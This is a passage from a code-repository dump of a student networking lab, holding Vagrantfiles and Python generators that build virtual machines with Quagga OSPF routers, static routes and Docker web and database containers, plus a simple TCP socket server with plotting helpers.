device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(\"NetworkGraphs/Template/OSPF_Routing_Template.html\", \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n # listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n # print(listOfDevice)\n # listOfDevice = yaml.load(listOfDevice) \n\n #newNet = remap(listOfDevice)\n\n #Network = MyNet #RICAMBIALA CON NEWNET\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"web\":\n writeWebServer(VagrantFile, node, edges)\n if node[\"type\"] == \"db\":\n writeDatabase(VagrantFile, node, edges)\n VagrantFile.write('end\\n')\n VagrantFile.close()\n\n"
},
{
"alpha_fraction": 0.6040105223655701,
"alphanum_fraction": 0.6730808019638062,
"avg_line_length": 39.105690002441406,
"blob_id": "12581a8537e24d8e8115dd6260da14e54e8dd776",
"content_id": "2561794048ce45a01f55c579b11a46f27b8c40d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 4937,
"license_type": "permissive",
"max_line_length": 156,
"num_lines": 123,
"path": "/AllVagrantFiles/Host_and_mysql_server_with_docker/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "##### One Host and a Mysql server with the Docker ####\n\n# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\nVagrant.configure(\"2\") do |config|\n config.vm.box_check_update = true\n config.vm.provider \"virtualbox\" do |vb|\n vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\n vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\n vb.cpus = 1\n end\n config.vm.define \"router-1\" do |router1|\n router1.vm.box = \"bento/ubuntu-16.04\"\n router1.vm.hostname = \"router-1\"\n router1.vm.network \"private_network\", ip: \"192.168.10.2\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n router1.vm.network \"private_network\", ip: \"192.168.10.3\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n\trouter1.vm.network \"private_network\", ip: \"192.168.10.4\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\n router1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \" Quagga Router-2 start installing\"\n\t#sudo sysctl -w net.ipv4.ip_forward=1\n\tsudo apt-get update\n\tsudo apt-get install quagga quagga-doc traceroute\n\tsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\n\tsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\n\tsudo chown quagga.quaggavty /etc/quagga/*.conf\n\tsudo /etc/init.d/quagga start\n\tsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\n\tsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\n\tsudo echo 'VTYSH_PAGER=more' >>/etc/environment\n\tsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\n\tsudo /etc/init.d/quagga restart\n\techo \"Routing Protocol ospf Configuration Started\"\n\tsudo vtysh -c '\n\tconfigure terminal\n\trouter ospf\n\tnetwork 192.168.10.0/24 area 0.0.0.0\n\tinterface eth1\n\tip address 192.168.10.2/24\n\texit\n\tinterface eth2\n\tip address 192.168.10.3/24\n\texit\n\tinterface eth3\n\tip address 192.168.10.4/24\n\tdo write\n\texit\n\texit\n\tip forwarding\n\texit'\n\techo \"Configuration END\"\n\techo \"Router--1 is ready to Use\"\t\n\tSHELL\n\trouter1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-a\" do |hosta|\n hosta.vm.box = \"bento/ubuntu-16.04\"\n hosta.vm.hostname = \"host-a\"\n hosta.vm.network \"private_network\", ip: \"192.168.10.10\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n hosta.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started for Host--A\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.2 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--A is ready to Use\"\t\n\tSHELL\n\thosta.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n # Configure web server machine\n config.vm.define \"web1\" do |web1|\n web1.vm.box = \"bento/ubuntu-16.04\"\n\t\t web1.vm.hostname = \"web-1\"\n web1.vm.network \"private_network\", ip: \"192.168.10.11\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n web1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\t echo \"Static Routig configuration Started for web-1\"\n\t sudo sysctl -w net.ipv4.ip_forward=1\n\t sudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.3 dev eth1\n echo \"Configuration END\"\n\t #echo \"web-1 is ready to Use\"\t\n\t SHELL\n\t\t web1.vm.provision \"docker\" do |doc|\n\t\t doc.pull_images \"nginx\"\n\t\t doc.pull_images \"php\"\n\t\t doc.run \"nginx\"\n\t\t doc.run \"php\"\n web1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n end\n # Configure database server machine\n config.vm.define \"db1\" do |db1|\n db1.vm.box = \"bento/ubuntu-16.04\"\n\t\t db1.vm.hostname = \"db-1\"\n db1.vm.network \"private_network\", ip: \"192.168.10.12\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\n db1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\t echo \"Static Routig configuration Started for db-1\"\n\t sudo sysctl -w net.ipv4.ip_forward=1\n\t sudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.4 dev eth1\n echo \"Configuration END\"\n\t #echo \"Host--B is ready to Use\"\t\n\t SHELL\n\t\t db1.vm.provision \"docker\" do |doc|\n\t doc.pull_images \"mysql\"\n\t\t doc.run \"mysql\"\n\t\t db1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n\tend\t \t \n end\n end\n\n\n\n\n"
},
{
"alpha_fraction": 0.6312790513038635,
"alphanum_fraction": 0.6792327165603638,
"avg_line_length": 45.78666687011719,
"blob_id": "f96ab82f36d906f0f61c86fdf7b20e2f924a127b",
"content_id": "035d76baa8f5fdbaa37f8178fcc317573e7f32fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10531,
"license_type": "permissive",
"max_line_length": 235,
"num_lines": 225,
"path": "/fromHTMLtoVagrant/OldScripts/OSPFRoutingVag.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport os\n\n\n# In[4]:\n\n\nf = open(\"OSPFRoutingvagrant.txt\", \"w\")\nf.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\nf.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\nf.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\nf.write(\"config.vm.box_check_update = true\\n\")\nf.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.cpus = 1\\n\")\nf.write(\"end\\n\")\n\n\nf.write(\"config.vm.define \\\"router-1\\\" do |router1|\\n\")\nf.write(\"router1.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router1.vm.hostname = \\\"router-1\\\"\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\nf.write(\"router1.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\" Quagga Router-1 start installing\\\"\\n\")\nf.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\nf.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\nf.write(\"sudo /etc/init.d/quagga start\\n\")\nf.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\nf.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\nf.write(\"sudo /etc/init.d/quagga restart\\n\")\nf.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\nf.write(\"sudo vtysh -c '\\n\")\nf.write(\"configure terminal\\n\")\nf.write(\"router ospf\\n\")\nf.write(\"network 192.168.1.0/24 area 0\\n\")\nf.write(\"network 192.168.100.0/24 area 0\\n\") \nf.write(\"network 192.168.101.0/24 area 0\\n\") \nf.write(\"exit\\n\")\nf.write(\"interface eth1\\n\")\nf.write(\"ip address 192.168.1.254/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth2\\n\")\nf.write(\"ip address 192.168.100.1/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth3\\n\")\nf.write(\"ip address 192.168.101.2/24\\n\")\nf.write(\"do write\\n\")\nf.write(\"exit\\n\")\nf.write(\"exit\\n\")\nf.write(\"ip forwarding\\n\")\nf.write(\"exit'\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--1 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"#router1.vm.provision \\\"shell\\\", path: \\\"common.sh\\\"\\n\")\nf.write(\"router1.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"router-2\\\" do |router2|\\n\")\nf.write(\"router2.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router2.vm.hostname = \\\"router-2\\\"\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: false\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\nf.write(\"router2.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\" Quagga Router-2 start installing\\\"\\n\")\nf.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\nf.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\nf.write(\"sudo /etc/init.d/quagga start\\n\")\nf.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\nf.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\nf.write(\"sudo /etc/init.d/quagga restart\\n\")\nf.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\nf.write(\"sudo vtysh -c '\\n\")\nf.write(\"configure terminal\\n\")\nf.write(\"router ospf\\n\")\nf.write(\"network 192.168.2.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.100.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.102.0/24 area 0.0.0.0\\n\")\nf.write(\"interface eth1\\n\")\nf.write(\"ip address 192.168.2.254/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth2\\n\")\nf.write(\"ip address 192.168.100.2/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth3\\n\")\nf.write(\"ip address 192.168.102.2/24\\n\")\nf.write(\"do write\\n\")\nf.write(\"exit\\n\")\nf.write(\"exit\\n\")\nf.write(\"ip forwarding\\n\")\nf.write(\"exit'\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--2 is ready to Use\\\"\\n\")\t\nf.write(\"SHELL\\n\")\nf.write(\"router2.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"router-3\\\" do |router3|\\n\")\nf.write(\"router3.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router3.vm.hostname = \\\"router-3\\\"\\n\")\nf.write(\"router3.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: false\\n\")\nf.write(\"router3.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\nf.write(\"router3.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\")\nf.write(\"router3.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Quagga Router-3 start installing\\\"\\n\")\nf.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\nf.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\nf.write(\"sudo /etc/init.d/quagga start\\n\")\nf.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\nf.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\nf.write(\"sudo /etc/init.d/quagga restart\\n\")\nf.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\nf.write(\"sudo vtysh -c '\\n\")\nf.write(\"configure terminal\\n\")\nf.write(\"router ospf\\n\")\nf.write(\"network 192.168.3.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.101.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.102.0/24 area 0.0.0.0\\n\")\nf.write(\"interface eth1\\n\")\nf.write(\"ip address 192.168.3.254/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth2\\n\")\nf.write(\"ip address 192.168.101.1/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth3\\n\")\nf.write(\"ip address 192.168.102.1/24\\n\")\nf.write(\"do write\\n\")\nf.write(\"exit\\n\")\nf.write(\"exit\\n\")\nf.write(\"ip forwarding\\n\")\nf.write(\"exit'\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--3 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"router3.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-a\\\" do |hosta|\\n\")\nf.write(\"hosta.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hosta.vm.hostname = \\\"host-a\\\"\\n\")\nf.write(\"hosta.vm.network \\\"private_network\\\", ip: \\\"192.168.1.1\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\")\nf.write(\"hosta.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--A\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--A is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hosta.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-b\\\" do |hostb|\\n\")\nf.write(\"hostb.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostb.vm.hostname = \\\"host-b\\\"\\n\")\nf.write(\"hostb.vm.network \\\"private_network\\\", ip: \\\"192.168.2.1\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\nf.write(\"hostb.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--B\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.254 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--B is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostb.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-c\\\" do |hostc|\\n\")\nf.write(\"hostc.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostc.vm.hostname = \\\"host-c\\\"\\n\")\nf.write(\"hostc.vm.network \\\"private_network\\\", ip: \\\"192.168.3.1\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: true\\n\")\nf.write(\"hostc.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.254 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--C is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostc.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\n\n\n#open and read the file after the appending:\nf = open(\"OSPFRoutingvagrant.txt\", \"r\")\nprint(f.read())\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.6584978699684143,
"alphanum_fraction": 0.6678012013435364,
"avg_line_length": 34.82926940917969,
"blob_id": "090267338c33e7ce72f9fd994eb4e702d20612bb",
"content_id": "d56c1357550ed65d8af049fc7c1d20cb7c3c0792",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4407,
"license_type": "permissive",
"max_line_length": 172,
"num_lines": 123,
"path": "/Server and Client/oldstuff/server.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import socket \nimport threading\n\n#those imports where added by luca\nfrom matplotlib import pyplot as plt \nimport os\nfrom os import path\nfrom PyQt5 import QtWidgets, QtCore\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\nimport sys \n\n\nHEADER = 64 # It's header length, it can be change.\nPORT = 5050 # port number where the server is going to talk (run).\nSERVER = \"192.168.53.133\" # this is ip of server, it can be change according to the server IP address.\n#SERVER = socket.gethostbyname(socket.gethostname()) # this another way to give the iP address by host name.\nADDR = (SERVER, PORT) # here we have bind the server and port.\nFORMAT = 'utf-8' # it's formate for the message\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Here we can create different kind of socket to get different kind of data. (socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR) # here we have bound that with ADDR.\n\ndef handle_client(conn, addr): # funcation to handel the clients that are going to connect with server.\n print(f\"[NEW CONNECTION] {addr} connected.\")\n\n connected = True\n while connected:\n msg_length = conn.recv(HEADER).decode(FORMAT) # receiving information for the client.\n if msg_length:\n msg_length = int(msg_length)\n msg = conn.recv(msg_length).decode(FORMAT)\n if msg == DISCONNECT_MESSAGE:\n connected = False\n\n print(f\"[{addr}] {msg}\")\n conn.send(\"Msg received\".encode(FORMAT))\n\n conn.close()\n \n\ndef start(): # its just start the socket server for us.\n server.listen()\n print(f\"[LISTENING] Server is listening on {SERVER}\")\n while True: # it will keep listening until server crash or stop.\n conn, addr = server.accept() # for new connection\n thread = threading.Thread(target=handle_client, args=(conn, addr))\n thread.start()\n print(f\"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}\")\n\n#this function is to plot the TCP data given an array of value for X axis and another array of values of the same size for the Y axis\n#the plot is an image file that can be found in the \"/plot\" directory\n#this is just \"standard\" plot, not the cool-looking one with pyqt5\n#this function was added by Luca\ndef save_plot(X,Y):\n if not path.exists(\"/plots\"):\n os.system(\"mkdir plots\")\n\n plt.title(\"TCP data\")\n plt.xlabel(\"X values\")\n plt.ylabel(\"Y values\")\n\n plt.plot(X,Y) \n plt.savefig(\"plots/TCPplot.png\")\n plt.clf()\n\n#this function is to plot the TCP data given using \"X\" and \"Y\" as arrays for the x and y axis\n#this is just is supposed to be the cool-looking graph with pyqt5 :)\n#the name of the function is create_plot() the class is used as a support it should not be used standalone\n#this function was added by Luca\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self, *args, **kwargs):\n\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n\n self.graphWidget.setTitle(\"TCP data\")\n self.graphWidget.setLabel('left', 'Y axis label ')\n self.graphWidget.setLabel('bottom', 'X axis label')\n self.graphWidget.showGrid(x=True, y=True)\n\n #here self.x and self.y should be the arrays with data of x and y axis\n #now it's just random generated data, substitite it with the actually arrays\n self.x = list(range(100)) \n self.y = [randint(0,100) for _ in range(100)] \n\n self.data_line = self.graphWidget.plot(self.x, self.y) #X,Y\n\n #stuff for updating \n self.timer = QtCore.QTimer()\n self.timer.setInterval(50)\n\n #this is the function that need to be called to update the plot of the graph\n self.timer.timeout.connect(self.update_plot_data)\n self.timer.start()\n\n\n def update_plot_data(self):\n\n self.x = self.x[1:] \n self.x.append(self.x[-1] + 1) \n\n self.y = self.y[1:] \n\n new_value = randint(0,10) #place-holder value, it should be the updated value for the y axis whene new data comes\n self.y.append(new_value) \n\n self.data_line.setData(self.x, self.y).\n\n\ndef create_plot():\n app = QtWidgets.QApplication(sys.argv)\n plt = MainWindow()\n plt.show()\n sys.exit(app.exec_())\n\n\nprint(\"[STARTING] server is starting...\")\nstart()\n"
},
{
"alpha_fraction": 0.5684430599212646,
"alphanum_fraction": 0.6060606241226196,
"avg_line_length": 34.44444274902344,
"blob_id": "71660664cc0c4a8db301d1b4183ec75ef64e4f72",
"content_id": "c0887178e46ddbc962f3daca390b236ce503fd92",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 957,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 27,
"path": "/AllVagrantFiles/Simple_web_server_and_a_Host/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# webserver and a host you can access the webserver from your browser with ip address 10.0.0.50 or from the host \n\n# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\nVagrant.configure(\"2\") do |config|\n # Configure web server machine\n config.vm.define \"web1\" do |web1|\n web1.vm.box = \"ubuntu/xenial64\"\n\t\t web1.vm.hostname = \"web-1\"\n web1.vm.network \"private_network\", ip: \"10.0.0.50\"\n web1.vm.provision \"shell\", inline: <<-SHELL \n echo 'Starting Provision: web server'\n sudo apt-get update\n sudo apt-get install -y nginx\n touch /var/www/html/index.php\n sudo apt-get install -y php-fpm php-mysql\n echo 'Provision web server complete'\n\t\t SHELL\n\t\t end\n # Configure database server machine\n config.vm.define \"db1\" do |db1|\n db1.vm.box = \"ubuntu/xenial64\"\n\t db1.vm.hostname = \"db-1\"\n\t\t db1.vm.network \"private_network\", ip: \"10.0.0.51\"\n end\n end\n"
},
{
"alpha_fraction": 0.5685438513755798,
"alphanum_fraction": 0.5916286706924438,
"avg_line_length": 38.23653793334961,
"blob_id": "5bfcd1a906192171ed9914bee388395f4851cd7c",
"content_id": "c3f2430374b3202d17d706f6fd708588869e8db6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20405,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 520,
"path": "/fromHTMLtoVagrant/VagrantTopologyMySQL.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc\nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n\n f.write(\"##### One Host and a Mysql server with the Docker ####\")\n\n f.write(\"# -*- mode: ruby -*-\\n\")\n f.write(\"# vi: set ft=ruby :\\n\")\n\n f.write(\"# All Vagrant configuration is done below. The \\\"2\\\" in Vagrant.configure\\n\")\n f.write(\"# configures the configuration version (we support older styles for\\n\")\n f.write(\"# backwards compatibility). Please don't change it unless you know what\\n\")\n f.write(\"# you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write('config.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\\n')\n f.write('vb.cpus = 1\\n')\n f.write('end\\n')\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f, Host, edges):\n\n # print(\"adding an host to the vagrant file\")\n\n #extrapolate each attribute from the touples\n Id = 